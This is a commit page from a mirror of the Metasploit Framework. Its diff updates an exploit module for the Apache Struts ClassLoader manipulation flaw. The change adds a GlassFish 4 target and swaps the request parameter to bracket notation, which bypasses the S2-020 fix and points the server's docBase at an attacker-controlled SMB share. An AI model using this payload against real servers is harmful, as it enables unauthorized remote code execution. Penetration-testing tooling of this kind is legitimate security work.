mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Use bypass for bulletin S2-020
This commit is contained in:
parent
a13cd2bcb7
commit
3be2bde5a2
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
|
||||
['Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)',
|
||||
{
|
||||
'Arch' => ARCH_JAVA,
|
||||
'Platform' => 'win'
|
||||
@ -235,7 +235,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
'version' => '1.1',
|
||||
'method' => 'GET',
|
||||
'vars_get' => {
|
||||
'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
|
||||
'class[\'classLoader\'].resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
|
||||
}
|
||||
})
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user